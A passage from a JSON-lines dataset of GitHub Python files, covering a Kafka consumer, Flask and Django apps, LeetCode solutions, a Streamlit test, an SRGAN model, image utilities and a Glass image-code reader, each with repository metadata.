max(lst)-min(lst)\n\na=s/8\n\nprint(s)\nprint(f'{a:.2f}')","repo_name":"GMO517/practise","sub_path":"GMO/python/PYA/pya605.py","file_name":"pya605.py","file_ext":"py","file_size_in_byte":142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"31869483712","text":"import json\nfrom kafka import KafkaConsumer, KafkaProducer\n\nORDER_KAFKA_TOPIC= \"order_details\"\nORDER_CONFIRMED_KAFKA_TOPIC= \"order_confirmed\"\n\"\"\"\nqhat the trasnactions.py file does is it receives a particular order detail from the kafka producer, reads it\nfrom the topic, decodes it, and sends back the required data points to a producer, writing to a new topic that confirms \norders\"\"\"\nconsumer= KafkaConsumer(\n ORDER_KAFKA_TOPIC,\n bootstrap_servers= \"localhost:29092\"\n)\n\nproducer= KafkaProducer(\n bootstrap_servers= \"localhost:29092\"\n)\n\nprint(\"listening started\")\n\nwhile True:\n for message in consumer:\n consumed_message= json.loads(message.value.decode())\n print(consumed_message)\n user_id= consumed_message[\"user_id\"]\n total_cost= consumed_message[\"total_cost\"]\n \n data= {\n \"customer_id\": user_id,\n \"customer_email\": f'{user_id}@gmail.com',\n \"total_cost\": total_cost\n }\n \n print(\"successful transaction...\")\n \n producer.send(\n ORDER_CONFIRMED_KAFKA_TOPIC, json.dumps(data).encode(\"utf-8\")\n )","repo_name":"echewisi/kafka_ordering_system","sub_path":"transactions.py","file_name":"transactions.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"36140135787","text":"#imports\r\nfrom flask import Flask, request\r\n\r\n#init app\r\napp = Flask(__name__)\r\n\r\n#homepage \r\n@app.route('/')\r\ndef getIP():\r\n ip_add = request.remote_addr #.remote_add gets local IP\r\n return '

IP: ' + ip_add\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"Adhitya3011/FlaskExercises","sub_path":"IP ADDRESS APP/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"39166264814","text":"import itertools\n# From problem https://leetcode.com/problems/circle-and-rectangle-overlapping/description/\n\nclass Solution:\n def in_rect(corners: tuple[int, int, int, int], point: tuple[int, int]) -> bool:\n x1, y1, x2, y2 = corners\n x, y = point\n # Has to be included in both dimensions\n return x1 <= x and x <= x2 and y1 <= y and y <= y2\n def in_semi(semi: tuple[tuple[int, int], tuple[int, int]], r2: int, point: tuple[int, int]) -> bool:\n (right, cx), (up, cy) = semi\n x, y = point\n if right and x < cx or not right and x > cx:\n # Has to be to the right side of the quarter circle/s quarter-cutting radius vectors\n return False\n if up and y < cy or not up and y > cy:\n # Has to be to the right side of the quarter circle/s quarter-cutting radius vectors\n return False\n # Has to be close enough\n return (cx - x)**2 + (cy - y)**2 <= r2\n def checkOverlap(self, r: int, xCenter: int, yCenter: int, x1: int, y1: int, x2: int, y2: int) -> bool:\n # They overlap if the circle's center is in the rounded rectangle around the rectangle or if the\n # rectangle's center is in some sort of other relation with the circle... let's do the firs one\n horiz_cross = (x1 - r, y1, x2 + r, y2)\n vert_cross = (x1, y1 - r, x2, y2 + r)\n rects = [horiz_cross, vert_cross]\n semis = list(itertools.product(enumerate([x1, x2]), enumerate([y1, y2])))\n center = (xCenter, yCenter)\n r2 = r**2\n return (\n any([Solution.in_rect(rect, center) for rect in rects]) or\n any([Solution.in_semi(semi, r2, center) for semi in semis])\n )","repo_name":"4gatepylon/gists","sub_path":"Algos/Leetcode/Dec23MediumsTest/CircleSquareIntersect.py","file_name":"CircleSquareIntersect.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"37597984054","text":"import os\nimport unittest\nfrom unittest.mock import PropertyMock, mock_open, patch\n\nimport pytest\n\nimport streamlit as st\nfrom streamlit.connections import BaseConnection\nfrom streamlit.runtime.secrets import AttrDict\n\nMOCK_TOML = \"\"\"\n[connections.my_mock_connection]\nfoo=\"bar\"\n\"\"\"\n\n\nclass MockRawConnection:\n def some_raw_connection_method(self):\n return \"some raw connection method\"\n\n\nclass MockConnection(BaseConnection[str]):\n def _connect(self, **kwargs) -> str:\n return MockRawConnection()\n\n def some_method(self):\n return \"some method\"\n\n\nclass BaseConnectionDefaultMethodTests(unittest.TestCase):\n def setUp(self) -> None:\n # st.secrets modifies os.environ, so we save it here and\n # restore in tearDown.\n self._prev_environ = dict(os.environ)\n\n def tearDown(self) -> None:\n os.environ.clear()\n os.environ.update(self._prev_environ)\n st.secrets._reset()\n\n def test_instance_set_to_connect_return_value(self):\n assert isinstance(\n MockConnection(\"my_mock_connection\")._instance, MockRawConnection\n )\n\n def test_getattr_works_with_methods_on_connection(self):\n assert MockConnection(\"my_mock_connection\").some_method() == \"some method\"\n\n def test_getattr_friendly_error_message(self):\n with pytest.raises(AttributeError) as e:\n MockConnection(\"my_mock_connection\").some_raw_connection_method()\n\n assert (\n str(e.value)\n == \"`some_raw_connection_method` doesn't exist here, but you can call `._instance.some_raw_connection_method` instead\"\n )\n assert (\n MockConnection(\"my_mock_connection\")._instance.some_raw_connection_method()\n == \"some raw connection method\"\n )\n\n def test_getattr_totally_nonexistent_attr(self):\n with pytest.raises(AttributeError) as e:\n MockConnection(\"my_mock_connection\").totally_nonexistent_method()\n\n assert (\n str(e.value)\n == \"'MockConnection' object has no attribute 'totally_nonexistent_method'\"\n )\n\n @patch(\"builtins.open\", new_callable=mock_open, read_data=MOCK_TOML)\n def test_secrets_property(self, _):\n conn = MockConnection(\"my_mock_connection\")\n assert conn._secrets.foo == \"bar\"\n\n @patch(\"builtins.open\", new_callable=mock_open, read_data=MOCK_TOML)\n def test_secrets_property_no_matching_section(self, _):\n conn = MockConnection(\"nonexistent\")\n assert conn._secrets == {}\n\n def test_secrets_property_no_secrets(self):\n conn = MockConnection(\"my_mock_connection\")\n assert conn._secrets == {}\n\n def test_instance_prop_caches_raw_instance(self):\n conn = MockConnection(\"my_mock_connection\")\n conn._raw_instance = \"some other value\"\n\n assert conn._instance == \"some other value\"\n\n def test_instance_prop_reinitializes_if_reset(self):\n conn = MockConnection(\"my_mock_connection\")\n conn._raw_instance = None\n\n assert isinstance(conn._instance, MockRawConnection)\n\n def test_on_secrets_changed_when_nothing_changed(self):\n conn = MockConnection(\"my_mock_connection\")\n\n # conn.reset() shouldn't be called because secrets haven't changed since conn\n # was constructed.\n with patch(\n \"streamlit.connections.base_connection.BaseConnection.reset\"\n ) as patched_reset:\n conn._on_secrets_changed(\"unused_arg\")\n patched_reset.assert_not_called()\n\n def test_on_secrets_changed(self):\n conn = MockConnection(\"my_mock_connection\")\n\n with patch(\n \"streamlit.connections.base_connection.BaseConnection.reset\"\n ) as patched_reset, patch(\n \"streamlit.connections.base_connection.BaseConnection._secrets\",\n PropertyMock(return_value=AttrDict({\"mock_connection\": {\"new\": \"secret\"}})),\n ):\n conn._on_secrets_changed(\"unused_arg\")\n patched_reset.assert_called_once()\n\n def test_repr_html_(self):\n repr_ = MockConnection(\"my_mock_connection\")._repr_html_()\n\n assert (\n \"st.connection my_mock_connection built from `tests.streamlit.connections.base_connection_test.MockConnection`\"\n in repr_\n )\n\n @patch(\"builtins.open\", new_callable=mock_open, read_data=MOCK_TOML)\n def test_repr_html_with_secrets(self, _):\n repr_ = MockConnection(\"my_mock_connection\")._repr_html_()\n\n assert (\n \"st.connection my_mock_connection built from `tests.streamlit.connections.base_connection_test.MockConnection`\"\n in repr_\n )\n assert \"Configured from `[connections.my_mock_connection]`\" in repr_\n","repo_name":"streamlit/streamlit","sub_path":"lib/tests/streamlit/connections/base_connection_test.py","file_name":"base_connection_test.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","stars":28590,"dataset":"github-code","pt":"73"} +{"seq_id":"16079361338","text":"import csv\n\"\"\"\nf = open('music.csv')\ndata = csv.reader(f)\nheading = next(data)\nfor row in data:\n print(row)\n\nprint(heading)\nf.close()\n\"\"\"\n\nwhile True:\n choice = input(\"Enter choice [R/W/X]\").lower() \n if choice == 'r':\n sr_no = int(input(\"Sr_no: \"))\n try:\n f = open(\"music.csv\")\n reader = csv.reader(f)\n next(reader)\n data = []\n for row in reader:\n data.append(row)\n f.close()\n except FileNotFoundError:\n print(\"No such file exists. First create it.\")\n else:\n print(\"Sr_no: \"+data[sr_no][0])\n print(\"Album: \"+data[sr_no][1])\n print(\"Artist: \"+data[sr_no][2])\n print(\"Genre: \"+data[sr_no][3])\n elif choice == 'w':\n album = input(\"Album: \")\n artist = input(\"Artist: \")\n genre = input(\"Genre: \")\n try:\n f = open(\"music.csv\", \"x\")\n f.write(\"Sr.No.,Album,Artist,Genre\")\n f.close()\n except FileExistsError:\n pass\n f = open(\"music.csv\")\n reader = csv.reader(f)\n data = []\n for row in reader:\n data.append(row)\n f.close()\n srNo = len(data) - 1\n data.append([f'\"{srNo}\",\"{album}\",\"{artist}\",\"{genre}\"'])\n f = open(\"music.csv\",\"w\")\n for album_list in data:\n f.writelines(album_list)\n f.write('\\n')\n f.close() \n elif choice=='x':\n break\n\n\n# Next Class: Resource Management\n\n\n","repo_name":"alakhpandya/Ritu_Kapadiya_Surat","sub_path":"Python/mar18.py","file_name":"mar18.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"70113586157","text":"import torch\nimport torch.nn as nn\n\nclass ResBlock(nn.Module):\n def __init__(self):\n super(ResBlock, self).__init__()\n k3n64s1 = nn.Conv2d(in_channels=64, out_channels=64, kernel_size=3, stride=1, padding=3//2)\n bn2d = nn.BatchNorm2d(num_features=64)\n \n self.block = nn.Sequential(\n k3n64s1,\n bn2d,\n nn.PReLU(),\n k3n64s1,\n bn2d\n )\n \n def forward(self, x):\n identity = x\n out = self.block(x)\n out += identity\n return out\n \nclass Upsampler(nn.Module):\n def __init__(self):\n super(Upsampler, self).__init__()\n \n self.upsample = nn.Sequential(\n nn.Conv2d(in_channels=64, out_channels=256, kernel_size=3, stride=1, padding=3//2),\n nn.PixelShuffle(2),\n nn.PReLU()\n )\n \n def forward(self, x):\n x = self.upsample(x)\n \n return x\n \n\nclass Generator(nn.Module):\n def __init__(self):\n super(Generator, self).__init__()\n B = 5\n \n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=3, out_channels=64, kernel_size=9, stride=1, padding=9//2),\n nn.PReLU()\n )\n \n block = [ResBlock() for _ in range(B)]\n self.block = nn.Sequential(*block)\n \n self.conv2 = nn.Sequential(\n nn.Conv2d(in_channels=64, out_channels=64, kernel_size=3, stride=1, padding=3//2),\n nn.BatchNorm2d(64)\n )\n \n upsample = [Upsampler() for _ in range(3)]\n self.upsample = nn.Sequential(*upsample)\n \n \n self.conv3 = nn.Conv2d(in_channels=64, out_channels=3, kernel_size=9, stride=1, padding=9//2)\n \n \n def forward(self,x):\n #x =x.permute(0, 3, 1, 2)\n x = self.conv1(x)\n x_res = x ##Residual\n x = self.block(x)\n x = self.conv2(x)\n x += x_res\n x = self.upsample(x)\n x = self.conv3(x)\n \n return x\n \nif __name__ == \"__main__\":\n G = Generator()\n input_x = torch.rand(1,32,32,3)\n print(input_x.shape)\n \n y = G(input_x)\n print(y.size())","repo_name":"HunbeomBak/srgan","sub_path":"models/Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"70395839275","text":"from PIL import Image\nimport os, errno\nimport image_slicer\nfrom shutil import move\n\nnew_width, new_height = 1280, 720\nnumber_of_slices = 4\nsourceDirectory='/Users/kris/Downloads/football1'\ndestinationDirectory='/Users/kris/Downloads/football2-resized2'\n\nif not os.path.exists(destinationDirectory):\n os.makedirs(destinationDirectory + '/slices')\n os.makedirs(destinationDirectory + '/resized')\n\n# Slice images one by one and copy them to the new directory\nfor filename in os.listdir(sourceDirectory):\n if filename.endswith(\".jpg\"):\n print(\"Slicing: {0}\".format(os.path.join(sourceDirectory, filename)))\n pre, ext = os.path.splitext(filename)\n tiles = image_slicer.slice(os.path.join(sourceDirectory, filename), number_of_slices, save=False)\n image_slicer.save_tiles(tiles, directory=destinationDirectory + '/slices', prefix=pre)\n\n\nfor filename in os.listdir(destinationDirectory + '/slices'):\n if filename.endswith(\".png\"):\n print(\"Resizing: {0}\".format(os.path.join(destinationDirectory + '/slices', filename)))\n img = Image.open(os.path.join(destinationDirectory + '/slices', filename))\n img = img.resize((new_width, new_height), Image.ANTIALIAS)\n img.save(os.path.join(destinationDirectory + '/resized', filename))\n continue\n else:\n continue\n\nprint('Done!')\n","repo_name":"Basavarajingalagi/Python","sub_path":"xml files/detectnet-tests-master/resize-img.py","file_name":"resize-img.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"39112104356","text":"## Default modules imported. Import more if you need to.\n\nimport numpy as np\nfrom skimage.io import imread, imsave\n\n# Fill this out\n# X is input 8-bit grayscale image\n# Return equalized image with intensities from 0-255\ndef histeq(X):\n\thist,bins = np.histogram(X.flatten(),256,normed=True)\n\tcdf = hist.cumsum()\n\tcdf = cdf * 255 / cdf[-1]\n\tim2 = np.interp(X.flatten(),bins[:-1],cdf)\n\treturn cdf.reshape(X.shape)\n \n\n########################## Support code below\n\nfrom os.path import normpath as fn # Fixes window/linux path conventions\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimg = imread(fn('inputs/p2_inp.png'))\n\nout = histeq(img)\n\nout = np.maximum(0,np.minimum(255,out))\nout = np.uint8(out)\nimsave(fn('outputs/prob2.png'),out)\n","repo_name":"huluhululiu/computer-vision","sub_path":"pset1/code/prob2.py","file_name":"prob2.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"27653118536","text":"#1438. Longest Continuous Subarray With Absolute Diff Less Than or Equal to Limit\nclass Solution:\n def longestSubarray(self, nums: List[int], limit: int) -> int:\n \n ## improved version of sliding window with two deques to get min/max\n ## time O(n), space O(n)\n \n l, r = 0, 0\n from collections import deque \n #Approach: Using deques as calculating max,min for each subarray is costly\n min_q = deque()\n max_q = deque()\n \n #STEP1: Iterate subarrays using window of l to r \n while r < len(nums):\n n = nums[r] #Get current element\n \n #STEP2: If current element < last element of min queue, pop it(REPEAT)\n while min_q and n < nums[min_q[-1]]:\n min_q.pop()\n \n #STEP3: If current element > last element of max queue, pop it(REPEAT)\n while max_q and n > nums[max_q[-1]]:\n max_q.pop()\n \n #---- Now queue satisfies insertion of current element ------\n \n #STEP4: Add index of current element to both queues at the last\n min_q.append(r)\n max_q.append(r)\n \n #STEP5: Get max and min values in current subarray\n max_e = nums[max_q[0]]\n min_e = nums[min_q[0]]\n \n #STEP6: If it violates limit, shrink the window from left\n if max_e - min_e > limit:\n l += 1\n #STEP7: We had previously considered the value we discarded, now we need to update our queues. So pop any index before current window\n while min_q and min_q[0] < l:\n min_q.popleft()\n while max_q and max_q[0] < l:\n max_q.popleft()\n r += 1\n \n #STEP8 Return the size of the current window.\n return (r-l)\n \n #r - l because r has increased by 1 already, no need to do r-l+1\n \n \n \n \n \n \n ## sliding window\n ## O(n**2) in worst case, space O(n)\n from collections import deque \n left, right = 0, 0\n window, win_min, win_max=defaultdict(int), float('inf'), float('-inf')\n out= float('-inf')\n while right limit:\n if window[nums[left]]==1:\n window.pop(nums[left])\n if nums[left]==win_min: win_min=min(window.keys())\n elif nums[left]==win_max: win_max=max(window.keys()) \n else:\n window[nums[left]]-=1\n\n left+=1 \n out=max(out, right-left)\n\n return out\n","repo_name":"jianhui-ben/leetcode_python","sub_path":"1438. Longest Continuous Subarray With Absolute Diff Less Than or Equal to Limit.py","file_name":"1438. Longest Continuous Subarray With Absolute Diff Less Than or Equal to Limit.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"4569472569","text":"from flask import Blueprint, jsonify, json\nfrom flask_restful import Api, Resource\n\nfrom order.modules.order.model import Order,orders_schema,order_schema\n\norder = Blueprint(\n 'order', #name of module\n __name__,\n template_folder='templates' # templates folder\n)\napi = Api(order)\n\n\nclass OrderApi(Resource):\n def get(self):\n data = Order.query.all()\n result = orders_schema.dump(data)\n return jsonify({'order': result.data})\n\n\nclass OrderGet(Resource):\n def get(self, id):\n data = Order.query.filter_by(id=id)\n result = orders_schema.dump(data)\n return jsonify({'order': result.data})\n\n\napi.add_resource(OrderApi,'/')\napi.add_resource(OrderGet,'/')\n","repo_name":"rezandry/flask-blueprint-docker-compose","sub_path":"order/modules/order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"42009204763","text":"from collections import defaultdict\n\ndef make_undirected_graph(edge_list):\n \"\"\" Makes an undirected graph from a list of edge tuples. \"\"\"\n graph = defaultdict(set)\n for e in edge_list:\n graph[e[0]].add(e[1])\n graph[e[1]].add(e[0])\n return graph\n\n\n\ndef reachable(graph, start_node):\n \"\"\"\n Returns:\n the set of nodes reachable from start_node\n \"\"\"\n result = set(start_node)\n frontier = set(start_node)\n while len(frontier) != 0:\n front = frontier.pop()\n for i in graph[front]:\n if i not in result:\n result.add(i)\n frontier.add(i)\n return list(result)\n\ndef test_reachable():\n graph = make_undirected_graph([('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'B')])\n assert sorted(reachable(graph, 'A')) == ['A', 'B', 'C', 'D']\n\n graph = make_undirected_graph([('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'B'), ('E', 'F'), ('F', 'G')])\n assert sorted(reachable(graph, 'A')) == ['A', 'B', 'C', 'D']\n assert sorted(reachable(graph, 'E')) == ['E', 'F', 'G']\n\n\n\ndef connected(graph):\n if len(graph) == 0:\n return True\n p = 0\n for i in graph:\n p = i\n break\n lst = reachable(graph, p)\n node = set()\n for i in graph:\n for j in i:\n node.add(j)\n if len(node) == len(lst):\n return True\n else:\n return False\n\ndef test_connected():\n graph = make_undirected_graph([('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'B')])\n assert connected(graph) == True\n graph = make_undirected_graph([('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'B'), ('E', 'F'), ('F', 'G')])\n assert connected(graph) == False\n\n\ndef n_components(graph):\n \"\"\"\n Returns:\n the number of connected components in an undirected graph\n \"\"\"\n ans = 0\n node = [i for i in graph]\n useNode = set()\n for i in node:\n if i in useNode:\n continue\n ans += 1\n lst = reachable(graph, i)\n for j in lst:\n useNode.add(j)\n return ans\n\n\n\ndef test_n_components():\n graph = make_undirected_graph([('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'B')])\n assert n_components(graph) == 1\n\n graph = make_undirected_graph([('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'B'), ('E', 'F'), ('F', 'G')])\n assert n_components(graph) == 2","repo_name":"allan-tulane/sp22-recitation-08-Alphardovo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"23103553812","text":"\"\"\"Untilities for reading data for the Glass and writing it into the Glass Working Directory\"\"\"\n\nimport os\nimport zlib\nimport bitarray\nimport diffpatch\n\nfrom PIL import Image, PyAccess\nfrom data_types import DataEntry\nfrom bitarray.util import ba2int\n\n\nclass Reader:\n \"\"\"The Reader is an class that can read the current Glass Code and store it's data into classes.\"\"\"\n\n def __init__(self):\n \"\"\"Create a Reader, that can read the current Glass Code and store it's data into classes.\"\"\"\n self.data_strips = []\n\n if os.path.isfile(\"glass.code.png\"):\n self.image = Image.open(\"glass.code.png\")\n self.pixel_map = self.image.load()\n\n self.reading_data_strip = False\n self.data_strip_position = []\n self.data_strip_index = 0\n\n for row in range(self.image.size[1]):\n if self.pixel_map[1, row] == 0 and not self.reading_data_strip:\n self.reading_data_strip = True\n self.data_strip_position.append(row)\n\n elif self.pixel_map[1, row] == 255 and self.reading_data_strip:\n self.reading_data_strip = False\n self.data_strip_position.append(row)\n\n self.data_strips.append(DataStrip(self, self.data_strip_position, self.data_strip_index))\n self.data_strip_position.clear()\n self.data_strip_index += 1\n\n def read(self, writeToDisk: bool = False):\n \"\"\"\n Read data from the Glass and store it in classes.\n If `writeToDisk` is set `False`, it will return a JSON object containing the files,\n if it's set to `True`, it will write the files into the Glass Working Directory.\n \"\"\"\n full_data = {}\n\n data_strip: DataStrip\n for data_strip in self.data_strips:\n for data_entry in data_strip.Data.entries:\n if data_entry.entry_type == \"diff\":\n diff = data_entry.data\n\n if data_entry.action == \"+\":\n if data_entry.path in full_data:\n contents = diffpatch.apply_patch(full_data[data_entry.path][\"data\"], diff)\n else:\n full_data[data_entry.path] = {}\n contents = diffpatch.apply_patch(\"\", diff)\n\n full_data[data_entry.path][\"date\"] = data_entry.date\n full_data[data_entry.path][\"entry_type\"] = data_entry.entry_type\n full_data[data_entry.path][\"action\"] = data_entry.action\n full_data[data_entry.path][\"data\"] = contents\n elif data_entry.entry_type == \"binary\":\n contents = data_entry.data\n full_data[data_entry.path] = {}\n\n full_data[data_entry.path][\"date\"] = data_entry.date\n full_data[data_entry.path][\"entry_type\"] = data_entry.entry_type\n full_data[data_entry.path][\"action\"] = data_entry.action\n full_data[data_entry.path][\"data\"] = contents\n elif data_entry.entry_type == \"dir\":\n full_data[data_entry.path] = {}\n\n full_data[data_entry.path][\"date\"] = data_entry.date\n full_data[data_entry.path][\"entry_type\"] = data_entry.entry_type\n full_data[data_entry.path][\"action\"] = data_entry.action\n\n old_full_data = full_data.copy()\n full_data.clear()\n\n for path in old_full_data:\n if old_full_data[path][\"entry_type\"] == \"dir\":\n full_data[path] = old_full_data[path]\n\n for path in old_full_data:\n if old_full_data[path][\"entry_type\"] != \"dir\":\n full_data[path] = old_full_data[path]\n\n if writeToDisk:\n for path in full_data:\n entry = full_data[path]\n\n if entry[\"action\"] == \"+\":\n if entry[\"entry_type\"] == \"diff\":\n with open(path, 'w') as file:\n file.write(entry[\"data\"])\n file.close()\n elif entry[\"entry_type\"] == \"binary\":\n with open(path, 'wb') as file:\n file.write(entry[\"data\"])\n file.close()\n elif entry[\"entry_type\"] == \"dir\" and not os.path.exists(path):\n os.makedirs(path)\n elif os.path.exists(path):\n os.remove(path)\n return None\n return full_data\n\n def compileEntries(self) -> list[DataEntry]:\n \"\"\"Compile all entries from the classes and return them.\"\"\"\n entries = []\n\n data_strip: DataStrip\n for data_strip in self.data_strips:\n for data_entry in data_strip.Data.entries:\n entries.append(data_entry)\n\n return entries\n\n def getChanges(self, path: str) -> list[str]:\n \"\"\"Find changes made to a file in the Glass Working Directory, compared to the Glass.\"\"\"\n file = \"\"\n\n dataStrip: DataStrip\n for dataStrip in self.data_strips:\n for entry in dataStrip.Data.entries:\n if entry.path != path:\n continue\n\n if entry.action in (\"dir\", \"binary\"):\n file = entry.data\n continue\n\n diff = entry.data\n file = diffpatch.apply_patch(file, diff)\n\n return file.splitlines(keepends=True)\n\n\nclass DataStrip:\n \"\"\"The DataStrip is a class that stores a piece of the Glass Code.\"\"\"\n\n def __init__(self, reader: Reader, position: list, index: int):\n \"\"\"Create a DataStrip that stores a piece of the Glass Code.\"\"\"\n self.position = position\n self.index = index\n self.Header = Header(reader.image.crop((1, self.position[0], 3, self.position[1])))\n self.Data = Data(reader.image.crop((4, self.position[0], 334, self.position[1])))\n\n self.loadHeader()\n self.loadData()\n\n def loadHeader(self):\n \"\"\"Load and store the header of the DataStrip.\"\"\"\n self.Header.setPixels(self.Header.image.load())\n raw_data = []\n\n for column in range(self.Header.image.size[0]):\n if column == 0:\n continue\n\n for row in range(self.Header.image.size[1]):\n pixel = self.Header.pixels[column, row]\n raw_data.append(1 if pixel == 255 else 0)\n\n self.Header.setEmptryDataLength(ba2int(bitarray.bitarray(raw_data)))\n self.Header.image.close()\n\n def loadData(self):\n \"\"\"Load and store the data of the DataStrip.\"\"\"\n self.Data.setPixels(self.Data.image.load())\n raw_data = []\n\n for column in range(self.Data.image.size[0]):\n for row in range(self.Data.image.size[1]):\n pixel = self.Data.pixels[column, row]\n raw_data.append(1 if pixel == 255 else 0)\n\n raw_data = raw_data[:len(raw_data) - self.Header.empty_data_length]\n for entry in zlib.decompress(bitarray.bitarray(raw_data).tobytes(), 15 + 32).decode(\"utf-8\").splitlines():\n self.Data.addEntry(entry)\n\n self.Data.image.close()\n\n\nclass Header:\n \"\"\"The Header class stores the header of a DataStrip.\"\"\"\n\n image: Image.Image\n pixels: PyAccess.PyAccess\n empty_data_length: int\n\n def __init__(self, image: Image.Image) -> None:\n \"\"\"Create the header of a DataStrip.\"\"\"\n self.image = image\n\n def setPixels(self, pixels: PyAccess.PyAccess):\n \"\"\"Set the `self.pixels` variable the a header.\"\"\"\n self.pixels = pixels\n\n def setEmptryDataLength(self, empty_data_length: int):\n \"\"\"Set the `self.empty_data_length` variable the a header.\"\"\"\n self.empty_data_length = empty_data_length\n\n\nclass Data:\n \"\"\"The Data class stores the data of a DataStrip.\"\"\"\n\n image: Image.Image\n pixels: PyAccess.PyAccess\n entries: list[DataEntry]\n\n def __init__(self, image: Image.Image) -> None:\n \"\"\"Create the data of a DataStrip\"\"\"\n self.image = image\n self.entries = []\n\n def setPixels(self, pixels: PyAccess.PyAccess):\n \"\"\"Set the `self.pixels` variable the a data.\"\"\"\n self.pixels = pixels\n\n def addEntry(self, entry: str):\n \"\"\"Add an entry to the data.\"\"\"\n self.entries.append(DataEntry(entry))\n","repo_name":"TMShader/GlassProject","sub_path":"glass/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":8497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1535117679","text":"# -*- coding: utf-8 -*-\n\nimport urlparse\n\nfrom django.db import connections\nfrom django.contrib import messages\nfrom django.shortcuts import redirect, get_object_or_404\n\nfrom adb.frontend.auth.decorators import permission_required, checks_permissions, require_permissions\nfrom adb.frontend.shortcuts import render_to_response\n\nfrom adb.frontend.checker import forms\n\n#@permission_required('checker.i')\ndef index(request):\n \n if request.method == 'POST':\n form = forms.CheckForm(request.POST)\n \n if form.is_valid():\n return redirect('checker:check', release=form.cleaned_data['id'])\n else:\n form = forms.CheckForm()\n \n return render_to_response('checker/index.html', {\n 'form': form,\n }, request)\n\ndef check(request, release):\n \n DATABASE = 'forum'\n FORUM = 18\n \n cursor = connections[DATABASE].cursor()\n \n query = \"\"\"SELECT p.pagetext, u.username, u.userid, t.title\n FROM thread t\n INNER JOIN post p ON t.firstpostid = p.postid\n INNER JOIN user u ON t.postuserid = u.userid\n WHERE t.threadid=%s AND t.forumid=%s\"\"\"\n \n cursor.execute(query, [int(release), FORUM])\n \n try:\n content, poster, posterid, title = cursor.fetchone()\n except TypeError:\n # No results returned, invalid ID or topic not in the allowed forum\n messages.error(request, 'Topic non trovato, assicurati che il topic esista e si trovi nel forum “Streaming › Film.”')\n return redirect('checker:index')\n \n from parser import PostParser\n from jinja2.utils import escape\n \n parser = PostParser()\n result, normalized, uppers = parser.parse(content)\n \n users = [[posterid, poster, 'Autore', [(posterid, poster)], 0]]\n \n offset = 0\n \n def mark(text, count, open, close, offset=0):\n start = '$$%d$$' % count\n end = '$$/%d$$' % count \n \n text = text[:open + offset] + start + text[open + offset:]\n offset += len(start)\n text = text[:close + offset] + end + text[close + offset:]\n offset += len(end)\n \n return text, offset\n \n for i, upper in enumerate(uppers):\n content, offset = mark(content, i, upper[1], upper[2], offset)\n db_users = None\n query = \"\"\"SELECT userid, username\n FROM user\n WHERE username=%s\"\"\"\n \n cursor.execute(query, [upper[0]])\n try:\n db_users = cursor.fetchall()\n \n if not db_users:\n raise TypeError\n except TypeError:\n try:\n query = \"\"\"SELECT userid, username\n FROM user\n WHERE username LIKE %s\"\"\"\n \n cursor.execute(query, ['%' + upper[0] + '%'])\n db_users = cursor.fetchall()\n \n if not db_users:\n raise TypeError\n except TypeError:\n # No results returned, invalid username\n users.append((None, upper[0], 'Testo', [(None, u'—')], i))\n \n if db_users:\n if len(db_users) is 1:\n userid = db_users[0][0]\n else:\n userid = None\n username = db_users\n \n if users[0][0] == userid:\n if not users[0][2].endswith('e testo'):\n users[0][2] += ' e testo'\n else:\n users.append((userid, upper[0], 'Testo', username, i))\n \n content = unicode(escape(content))\n \n for i, upper in enumerate(uppers):\n content = content.replace('$$%d$$' % i, ' ' % i)\n content = content.replace('$$/%d$$' % i, '')\n \n return render_to_response('checker/results.html', {\n 'release': release,\n 'content': content,\n 'uppers': users,\n 'urls': normalized,\n 'images': result['Immagine'],\n 'title': title,\n }, request)\n\n","repo_name":"AnimeDB/adb-browser-frontend","sub_path":"adb/frontend/checker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"88317243","text":"import math\nimport random\nimport utils\n\n\nclass SimulatedAnnealingConfig:\n def __init__(self, temp: int, stoppingTemp: float, alpha: float, stoppingIter: float) -> None:\n self.temp = temp\n self.stoppingTemp = stoppingTemp\n self.alpha = alpha\n self.stoppingIter = stoppingIter\n\n\nclass SimulatedAnnealing:\n def __init__(self, coords, config: SimulatedAnnealingConfig):\n self.coords = 